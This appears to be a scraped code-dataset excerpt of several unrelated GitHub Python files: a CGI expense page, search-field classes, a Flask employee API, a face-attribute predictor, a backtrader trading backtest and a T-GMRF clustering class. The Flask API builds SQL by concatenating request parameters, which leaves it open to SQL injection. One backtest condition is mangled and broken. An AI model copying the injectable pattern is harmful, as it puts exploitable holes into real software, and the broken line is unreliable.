"call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "sklearn.metrics.plot_confusion_matrix", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.inspection.permutation_importance", "line_number": 83, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 120, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "attribute"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "attribute"}, {"api_name": "umap.UMAP", "line_number": 193, "usage_type": "call"}]}
+{"seq_id": "36373414632", "text": "#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nfrom controlador_gastos import * #conexion y funciones con la tabla gastos\nfrom controlador_categorias import * #conexion y funciones con la tabla categorias\n\nprint(\"Content-Type: text/html\\n\")\n\n#Parametros de la busqueda\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\nuser_id = form.getfirst('user_id','empty')\nfecha_inicial = form.getfirst('fecha_inicial','empty')\nfecha_final = form.getfirst('fecha_final','empty')\n\n#Encabezado generico\nprint(\"\"\"\n\t\n\t\n\tCGI script! Python \n\t\n\t\n\"\"\"\n)\n\n#Tabla de resultados\nprint (\"\"\"\n\t \n\t\n\"\"\"\n)\n\n#Lee los campos de su formulario para la modificacion de registros\nprint (\"\"\"\n\n\"\"\"\n)\t", "repo_name": "stormvolt/SGPF", "sub_path": "sitio_web/tabla_gastos.py", "file_name": "tabla_gastos.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cgitb.enable", "line_number": 3, "usage_type": "call"}, {"api_name": "cgi.FieldStorage", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "42800583313", "text": "from .utils import str_or_none\n\n\nclass SourceField:\n\n def __init__(\n self, source, source_field_name, field_description,\n is_title, is_facet, field_type, index_field):\n\n self.source = str_or_none(source)\n self.source_field_name = str_or_none(source_field_name)\n self.field_description = str_or_none(field_description)\n self.is_title = True if is_title != '' else False\n self.is_facet = True if is_facet != '' else False\n self.field_type = str_or_none(field_type)\n self.index_field = str_or_none(index_field)\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n\n\nclass IndexField:\n\n def __init__(self, index_field, field_type, is_facet):\n\n self.index_field = index_field\n\n if field_type.endswith('[]'):\n self.field_type = field_type.rstrip('[]')\n self.is_array = True\n else:\n self.field_type = field_type\n self.is_array = False\n\n self.is_facet = is_facet\n self.source_fields = []\n\n self._added = set()\n\n def add_source_field(self, source_field):\n\n self._ensure_right_type(source_field)\n self._ensure_not_duplicate(source_field)\n self._ensure_facet(source_field)\n\n self.source_fields.append(source_field)\n\n def _ensure_right_type(self, source_field):\n\n index_type = self.field_type\n if self.is_array:\n index_type += '[]'\n\n assert source_field.field_type == index_type, \\\n f'Index field type mismatch. {source_field} must be of type {self.field_type}'\n\n def _ensure_not_duplicate(self, source_field):\n\n key = source_field.source + source_field.source_field_name\n assert key not in self._added, f'Diplicate key: {key}'\n self._added.add(key)\n\n def _ensure_facet(self, source_field):\n '''Все поля источника данного поля индекса должны иметь одинаковое значение is_facet.\n Если есть различия, то надо создать несколько полей индекса\n '''\n assert source_field.is_facet == self.is_facet, \\\n f'IS_FACET mismatch: {source_field} has is_facet different from {self.is_facet}'\n\n def __str__(self):\n\n fields = []\n for key in self.__dict__:\n fields.append(f'{key}={self.__dict__[key]}')\n\n return self.__class__.__name__ + '(' + ', '.join(fields) + ')'\n\n def __repr__(self):\n\n return self.__str__()\n", "repo_name": "Sapunov/aisconfgen", "sub_path": "aisconfgen/fields.py", "file_name": "fields.py", "file_ext": "py", "file_size_in_byte": 2758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.str_or_none", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 11, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 15, "usage_type": "call"}, {"api_name": "utils.str_or_none", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "30037749195", "text": "from datetime import datetime\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom sqlalchemy import create_engine\nfrom flask_jsonpify import jsonify\nfrom flask_cors import CORS\n\ndb_connect = create_engine('sqlite:///database/enterprise.db')\napp = Flask(__name__)\napi = Api(app)\ncor_app = CORS(app)\n\n\nclass Employee (Resource):\n\n @app.route('/employees', methods=['GET'])\n def get_all_employees():\n conn = db_connect.connect() # connect to database\n query = conn.execute(\"select * from employees\") # This line performs query and returns json result\n return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID\n\n @app.route('/employees/', methods=['GET'])\n def get_employee(employee_id):\n try:\n eid = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = conn.execute(\"select * from employees where EmployeeId =%d \" % eid)\n result = {'data': [dict(zip(tuple(query.keys()), i)) for i in query.cursor]}\n return jsonify(result)\n\n @app.route('/employees/create', methods=['POST'])\n def create_employee():\n column_names = {\n \"first_name\": \"FirstName\",\n \"last_name\": \"LastName\",\n \"address\": \"Address\",\n \"birth_date\": \"BirthDate\",\n \"city\": \"City\",\n \"country\": \"Country\",\n \"email\": \"Email\",\n \"fax\": \"Fax\",\n \"hire_date\": \"HireDate\",\n \"phone\": \"Phone\",\n \"postal_code\": \"PostalCode\",\n \"reports_to\": \"ReportsTo\",\n \"state\": \"State\",\n \"title\": \"Title\"\n }\n first_name = request.args.get('first_name')\n last_name = request.args.get('last_name')\n if first_name is None or last_name is None:\n return {\"error\": \"Field names are required\"}\n if len(first_name) == 0 or len(last_name) == 0:\n return {\"error\": \"Field names are empty\"}\n columns = \",\".join(column_names.get(column) for column in request.args)\n values = \"'{}', '{}'\".format(first_name, last_name)\n try:\n for column in request.args:\n if column != \"first_name\" and column != \"last_name\":\n value = request.args[column]\n if column == \"hire_date\" or column == \"birth_date\":\n values = values + \",'{}'\".format(datetime.strptime(value, \"%Y-%m-%d\"))\n elif column == \"reports_to\":\n values = values + \",{}\".format(int(value))\n else:\n values = values + \",'{}'\".format(value)\n except Exception as e:\n return {\"error\": \"Verify your parameters: {}\".format(e)}\n conn = db_connect.connect()\n print(columns, values)\n query = conn.execute(\"INSERT INTO employees (\" + columns + \") VALUES ( \" + values + \" )\")\n return {\"success\": \"Employee created, number of rows {}\".format(query.rowcount)}\n\n @app.route('/employees/delete', methods=['POST'])\n def delete_employee():\n employee_id = request.args.get('employee_id')\n if employee_id is None:\n return {\"error\": \"Employee ID not defined\"}\n try:\n employee_id = int(employee_id)\n except Exception as e:\n return {\"error\": \"Invalid employee ID: {}\".format(e)}\n conn = db_connect.connect()\n query = \"DELETE FROM employees where EmployeeId =%d \" % employee_id\n query = conn.execute(query)\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n @app.route('/employees/delete/last', methods=['POST'])\n def delete_last_employee():\n conn = db_connect.connect()\n query = conn.execute(\"DELETE FROM employees where EmployeeId = (SELECT MAX(EmployeeId) FROM employees)\")\n if query.rowcount == 0:\n return {\"skipped\": \"No employee was deleted\"}\n return {\"success\": \"Number of rows deleted {}\".format(query.rowcount)}\n\n\napi.add_resource(Employee) # Route_1\n\nif __name__ == '__main__':\n app.run(port='5002')\n", "repo_name": "amanajas/flask", "sub_path": "rest.py", "file_name": "rest.py", "file_ext": "py", "file_size_in_byte": 4333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_restful.Api", "line_number": 10, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_restful.Resource", "line_number": 14, "usage_type": "name"}, {"api_name": "flask_jsonpify.jsonify", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 78, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 78, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 78, "usage_type": "name"}]}
+{"seq_id": "16242697518", "text": "import threading\nimport time\nfrom utils.gendern import gender_detector\nfrom utils.age import age_detector\nfrom utils.emotion import emotion_detector\n\nclass prediction:\n def __init__(self, gen_det, age_det, emo_det):\n self.age_detector = age_detector()\n self.gender_detector = gender_detector()\n self.emotion_detector = emotion_detector()\n self.images = []\n self.results = []\n self.gen_det=gen_det\n self.age_det=age_det\n self.emo_det=emo_det\n\n def start_threads(self):\n x = threading.Thread(target=self.predict, args=([]), daemon=True)\n x.start()\n\n def pass_detections(self, dets):\n self.images = dets\n\n def predict(self):\n while True:\n try:\n newdets = []\n for img in self.images:\n age = \"\"\n gender = \"\"\n emotion = \"\"\n # Predict gender\n if(self.gen_det):\n gender = self.gender_detector.detect_gender(img[1])\n # Predict age\n if(self.age_det):\n age = self.age_detector.detect_age(img[1])\n # Predict emotion\n if (self.emo_det):\n emotion = self.emotion_detector.detect_emotion(img[1])\n # Append results to newdets\n newdets.append([img[0], img[1], gender, age, emotion])\n self.results = newdets\n except Exception as e:\n print(str(e))\n time.sleep(1/10)", "repo_name": "kretmatt/InnovationLab3", "sub_path": "utils/prediction.py", "file_name": "prediction.py", "file_ext": "py", "file_size_in_byte": 1612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.age.age_detector", "line_number": 9, "usage_type": "call"}, {"api_name": "utils.gendern.gender_detector", "line_number": 10, "usage_type": "call"}, {"api_name": "utils.emotion.emotion_detector", "line_number": 11, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "5157315117", "text": "\nimport numpy as np\nimport matplotlib\nimport pandas as pd\nimport datetime\nimport os.path\nimport sys\nimport math\nimport backtrader as bt\n\nfrom backtrader_plotting import Bokeh\nfrom backtrader_plotting.schemes import Tradimo\nmatplotlib.use('QT5Agg')\n\n\nfrom enum import Enum\nclass OrderDirection(Enum):\n NOTHING = 1\n BUY = 2\n SELL = 3\n\ndef StrategyN(n):\n return globals()['Strategy'+str(n)]\n\n\n\ndef Strategy1(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy2(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\ndef Strategy3(df, profit_ratio=2.5):\n pexec = df.tail(1)['close'].values[0]\n direction = OrderDirection.NOTHING\n pslimit = psloss = np.nan\n #insert your strategy here\n return direction, pexec, pslimit, psloss\n\n\n\n \n# Create a Stratey\nclass TestStrategy(bt.Strategy):\n params = (\n ('Strategy_idx', 1),\n ('backtest_days', 6),\n ('len_df', 10), \n )\n\n \n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime[0]\n dt = bt.num2date(dt)\n print('%s(%d), %s' % (dt.isoformat(), self.nextcount, txt), file=self.f)\n\n def __init__(self):\n print('Strategy_idx'+str(self.p.Strategy_idx))\n self.outputpath = 'output.txt'\n self.f = open(self.outputpath, 'w') \n # self.profit_ratio = 2.5\n self.singleposloss = 5.0\n self.nextcount = 0\n self.dataclose = self.datas[0].close\n # self.lastcounttrade = 4000\n \n # To keep track of pending orders\n self.order = list()\n self.order_executed_price = None\n self.order_takeprofit_price = None\n self.order_stoploss_price = None\n self.order_size = None\n self.sma = bt.indicators.SimpleMovingAverage(period=self.p.len_df-24*self.p.backtest_days)#dummy for prepare data\n \n \n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log('BUY EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))\n elif order.issell():\n self.log('SELL EXECUTED, %.8f | CURRENT POSITION: %.8f' %(order.executed.price, self.getposition(self.data).size))#, cerebro.broker.getvalue()\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled]:\n self.log('Order Canceled')\n elif order.status in [order.Margin]:\n self.log('Order Margin')\n elif order.status in [order.Rejected]:\n self.log('Order Rejected') \n\n # Write down: no pending order\n self.order = None\n \n def stop(self):\n self.order = self.order_target_size(target=0) \n self.log('STOP')\n self.log('CURRENT POSITION: %.8f' %self.getposition(self.data).size)\n self.log('TEST COUNT: %d' %self.nextcount)\n self.f.close()\n \n def next(self): \n self.nextcount = self.nextcount + 1\n self.log('Close, %.8f' %(self.dataclose[0]))\n \n if self.order:\n return\n\n\n # Check if we are in the market\n if not self.position:\n # print(len(self.dataclose))\n # print(self.datas[0].datetime.get(size=len(self.dataclose)))\n coldata_time = self.data.datetime.get(size=len(self.dataclose))\n coldata_open = self.data.open.get(size=len(self.dataclose))\n coldata_high = self.data.high.get(size=len(self.dataclose))\n coldata_low = self.data.low.get(size=len(self.dataclose))\n coldata_close = self.data.close.get(size=len(self.dataclose))\n coldata_volume = self.data.volume.get(size=len(self.dataclose))\n df_new = pd.DataFrame({'open': coldata_open,\n 'high': coldata_high,\n 'low': coldata_low,\n 'close': coldata_close,\n 'volume': coldata_volume})\n df_new.index = pd.to_datetime(df_new.index, format = '%Y-%m-%d %H:%M:%S')\n df_new.index.name = 'dateTime'\n\n direction, pexec, pslimit, psloss = StrategyN(self.p.Strategy_idx)(df_new)\n\n \n #sanity check\n if direction == OrderDirection.BUY and (pexecpsloss or pslimit>pexec):\n direction = OrderDirection.NOTHING\n \n if direction == OrderDirection.BUY:\n self.order_size = self.singleposloss/(pexec-psloss)\n self.log('BUY CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss))\n self.order = self.buy_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n \n \n elif direction == OrderDirection.SELL: \n self.order_size = self.singleposloss/(psloss-pexec)\n self.log('SELL CREATE, (price: %.8f, pos: %.8f, cost: %.8f, lim: %.8f, sl: %.8f)' %(pexec,\n self.order_size,\n pexec*self.order_size,\n pslimit,\n psloss)) \n self.order = self.sell_bracket(\n price=pexec, size=self.order_size,\n stopprice=psloss,\n limitprice=pslimit)\n \n\n\n\n# Create a cerebro entity\n \ndef run_backtest(target_pair, Strategy_idx, backtest_days):\n cerebro = bt.Cerebro()\n # df.to_csv('rawdata.csv',index=False)\n df = pd.read_csv('./1h_all/' + target_pair + '.csv', index_col=\"dateTime\", infer_datetime_format=True, parse_dates=True)\n df = df[[\"open\", \"high\", \"low\", \"close\", \"volume\"]]\n df.columns = [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n # df = df.tail(24*30*2)#60days backtest\n \n df.to_csv('./backtest/' + target_pair + '.csv')\n \n \n \n\n \n\n \n # Add a strategy\n cerebro.addstrategy(TestStrategy, Strategy_idx=Strategy_idx, backtest_days=backtest_days, len_df=len(df))\n \n\n # Datas are in a subfolder of the samples. Need to find where the script is\n # because it could have been called from anywhere\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\n datapath = os.path.join(modpath, './backtest/' + target_pair + '.csv')\n \n rawdata = bt.feeds.GenericCSVData(\n dataname=datapath,\n dtformat=('%Y-%m-%d %H:%M:%S'),\n name='rawdata',\n openinterest=-1\n )\n cerebro.adddata(rawdata)\n \n \n cerebro.resampledata(\n rawdata, \n timeframe=bt.TimeFrame.Days, #timeframe=bt.TimeFrame.Minutes, \n compression=1, #compression=60*8, \n name='daydata'\n )#8HR S/R\n # cerebro.adddata(pivotdata)\n \n cerebro.addobserver(bt.observers.Benchmark,\n timeframe=bt.TimeFrame.Weeks\n )\n cerebro.addanalyzer(bt.analyzers.TradeAnalyzer, _name=\"ta\")\n\n cerebro.addanalyzer(bt.analyzers.SQN, _name=\"sqn\")\n # 1.6 - 1.9 Below average\n # 2.0 - 2.4 Average\n # 2.5 - 2.9 Good\n # 3.0 - 5.0 Excellent\n # 5.1 - 6.9 Superb\n # 7.0 - Holy Grail?\n \n # Set our desired cash start\n cerebro.broker.setcash(162*10.0)\n \n \n \n # Print out the starting conditions\n print('Starting Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue()\n # Run over everything\n # cerebro.run(runonce=False)\n strategies = cerebro.run()\n firstStrat = strategies[0]\n \n # Print out the final result\n print('Final Portfolio Value: %.8f' % cerebro.broker.getvalue())\n myportfolio = cerebro.broker.getvalue() - myportfolio\n # cerebro.plot(style=\"candle\", iplot=False)\n \n # b = Bokeh(filename='chart.html', style='bar', plot_mode='single', scheme=Tradimo())\n # cerebro.plot(b, iplot=False)\n \n \n \n sqn = firstStrat.analyzers[1].get_analysis()['sqn']\n trades = firstStrat.analyzers[1].get_analysis()['trades']\n\n \n return sqn, trades, myportfolio\n\nif __name__ == '__main__':\n \n try:\n target_pair = (sys.argv[1])\n Strategy_idx = (sys.argv[2])\n backtest_days = (sys.argv[3])\n except:\n target_pair = \"BTCUSDT\"\n Strategy_idx = 3#3:0.6, 4:0.3\n backtest_days = 7\n \n run_backtest(target_pair, Strategy_idx, backtest_days)\n ", "repo_name": "hunej/BinanceFuturesQuanTradingFramework", "sub_path": "mybacktest.py", "file_name": "mybacktest.py", "file_ext": "py", "file_size_in_byte": 9532, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.Enum", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 42, "usage_type": "attribute"}, {"api_name": "backtrader.Strategy", "line_number": 50, "usage_type": "attribute"}, {"api_name": "backtrader.num2date", "line_number": 61, "usage_type": "call"}, {"api_name": "backtrader.indicators.SimpleMovingAverage", "line_number": 80, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 138, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path.dirname", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 203, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 204, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 204, "usage_type": "name"}, {"api_name": "backtrader.feeds.GenericCSVData", "line_number": 206, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 206, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 217, "usage_type": "attribute"}, {"api_name": "backtrader.observers", "line_number": 223, "usage_type": "attribute"}, {"api_name": "backtrader.TimeFrame", "line_number": 224, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 226, "usage_type": "attribute"}, {"api_name": "backtrader.analyzers", "line_number": 228, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 268, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 269, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 270, "usage_type": "attribute"}]}
+{"seq_id": "27380021021", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 1 22:14:30 2020\n\n@author: vito\n\"\"\"\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom Solver.TGMRF_solver import TGMRF_solver\nfrom time import time\nimport os\nimport pickle as pkl\n\nclass TGMRF:\n \"\"\"\n The implementation is Time-varying Gaussian Markov Random Feilds based clustering algorithm\n \n Parameters\n ----------\n \"\"\"\n def __init__(self, epsilon=50, width=10, stride=1, maxIters=30, lr=0, lamb=1e-2, beta=1e-2, measure=\"euclidean\", verbose=True, verbose_ADMM=False,dimension_reduce=True,dataset_name=\"Test\",use_dump=False,maxIters_ADMM=1000):\n self.epsilon = epsilon\n self.width = width\n self.stride = stride\n self.measure = measure\n self.maxIters = maxIters\n self.lr =lr\n self.lamb = lamb\n self.beta = beta\n self.verbose = verbose\n self.project_matrix = None\n self.initilizing = False\n self.verbose_ADMM = verbose_ADMM\n self.dimension_reduce = dimension_reduce\n self.dataset_name = dataset_name\n self.use_dump = use_dump\n self.maxIters_ADMM = maxIters_ADMM\n \n def triangle_l_2_matrix_l(self, l):\n n = int((-1 + np.sqrt(1+ 8*l))/2)\n return n\n \n def upper2Full(self, a):\n n = self.triangle_l_2_matrix_l(a.shape[0])\n A = np.zeros([n,n])\n A[np.triu_indices(n)] = a\n temp = A.diagonal()\n A = (A + A.T) - np.diag(temp)\n return A\n \n def predict(self, X):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n C_trans : array, shape [n_samples, k]\n Compacted vectors of T-GMRF after PCA\n \"\"\"\n if not type(self.project_matrix) is np.ndarray:\n raise RuntimeError('Please fitting the model beforehand!')\n\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n m_lengths = X.shape[2]\n l_features = X.shape[1]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, initilizing=self.initilizing, verbose_ADMM=self.verbose_ADMM,maxIters_ADMM=self.maxIters_ADMM)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n\n # Projecting the features\n C_trans = np.dot(C_normalize.T, self.project_matrix)\n\n return C_trans\n \n def fit_transform(self, X):\n \"\"\"\n Transform X todistance matrix.\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n distance : array, shape [n_samples, n_samples]\n similarity distance matrix.\n ...\n Other useful data structure.\n \"\"\"\n # Compute Time-varying Gaussian Markov Random Fields for every MTS (multivariaten time series) \n n_samples = X.shape[0]\n l_features = X.shape[1]\n m_lengths = X.shape[2]\n s_windows = int((m_lengths - self.width) / self.stride + 1)\n self.C = np.zeros((int(l_features * (l_features + 1) * s_windows / 2), n_samples))\n cov_matrix_len = int(l_features * (l_features + 1) / 2)\n\n duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = 0, 0, 0, 0\n\n start = time()\n\n dump_file = f\"./dump/{self.dataset_name}/T_GMRF_{self.dataset_name}_dump.pkl\"\n\n if not os.path.exists(dump_file) or not self.use_dump:\n\n if self.dataset_name in ['EEG', \"DuckDuckGeese\", \"FingerMovements\"]:\n initilizing = True\n else:\n initilizing = False\n\n clf = TGMRF_solver(width=self.width, stride=self.stride, \n maxIters=self.maxIters, lr=self.lr, lamb=self.lamb, beta=self.beta, verbose_ADMM=self.verbose_ADMM,initilizing=initilizing)\n \n aggregated_ll_Loss = 0\n aggregated_penalty_loss = 0\n\n for i in tqdm(range(n_samples), ascii=True, desc=\"TGMRF\"):\n ics, loss, ll_loss, penalty_loss, numberOfParameters = clf.fit(X[i].T)\n aggregated_ll_Loss += ll_loss\n aggregated_penalty_loss += penalty_loss\n for j in range(s_windows):\n self.C[j * cov_matrix_len: (j + 1) * cov_matrix_len, i] = ics[j]\n \n if self.use_dump:\n output = open(dump_file, 'wb')\n pkl.dump(self.C, output)\n else:\n output = open(dump_file, 'rb')\n self.C = pkl.load(output)\n \n duration = time() - start\n \n # normalizing C\n \"\"\"\n # worsen performance for z-normalize\n # the l2-norm normalization is applied\n quantile_transformer = preprocessing.QuantileTransformer(\n output_distribution='normal', random_state=0)\n C = quantile_transformer.fit_transform(C)\n \"\"\"\n\n C_normalize = preprocessing.normalize(self.C, norm='l2')\n # keep original feature\n # C_normalize = self.C\n \n if self.dimension_reduce:\n \n try:\n reduce_dump = f\"./dump/{self.dataset_name}/Reduce_{self.dataset_name}_dump.pkl\"\n use_reduce_dump = False\n if not os.path.exists(reduce_dump) or not use_reduce_dump:\n\n # Covariance of C\n Sigma_c = np.cov(C_normalize)\n \n # Run SVD algorithm onto covariance matrix of C\n u, s, vh = np.linalg.svd(Sigma_c, full_matrices=True)\n\n if use_reduce_dump:\n reduce = open(reduce_dump, 'wb')\n pkl.dump((Sigma_c, u, s, vh), reduce)\n else:\n reduce = open(reduce_dump, 'rb')\n Sigma_c, u, s, vh = pkl.load(reduce)\n \n # According to the energy content threshold, select the first k eigenvectors\n totally_variance = sum(s)\n k = len(s)\n for i in range(len(s), 0, -1):\n if sum(s[:i])/totally_variance*100 < self.epsilon:\n k = i + 1\n break\n \n # Projecting the features\n C_trans = np.dot(C_normalize.T, u[:, :k])\n\n # dump the projecting matrix\n self.project_matrix = u[:, :k]\n except:\n pca = PCA(n_components=8) # DuckDuckGeese:8\n C_trans = pca.fit_transform(C_normalize.T)\n else:\n C_trans = C_normalize.T\n \n return C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters\n\n def fit(self, X_train, X_test):\n \"\"\"\n Fix the model and construct the project matrix\n \n Parameters\n ----------\n X : {array-like, sparse matrix}, shape = [n_samples, l_features, m_lengths]\n New data to transform.\n \n Returns\n -------\n None\n \"\"\"\n\n X = np.concatenate((X_train, X_test), axis=0)\n\n C_trans, duration, aggregated_ll_Loss, aggregated_penalty_loss, numberOfParameters = self.fit_transform(X)\n \n C_trans_train = C_trans[:X_train.shape[0]]\n\n C_trans_test = C_trans[-X_test.shape[0]:]\n\n return C_trans, C_trans_train, C_trans_test", "repo_name": "Vitoom/T-GMRF", "sub_path": "TGMRF.py", "file_name": "TGMRF.py", "file_ext": "py", "file_size_in_byte": 8544, "program_lang": "python", "lang": "en", 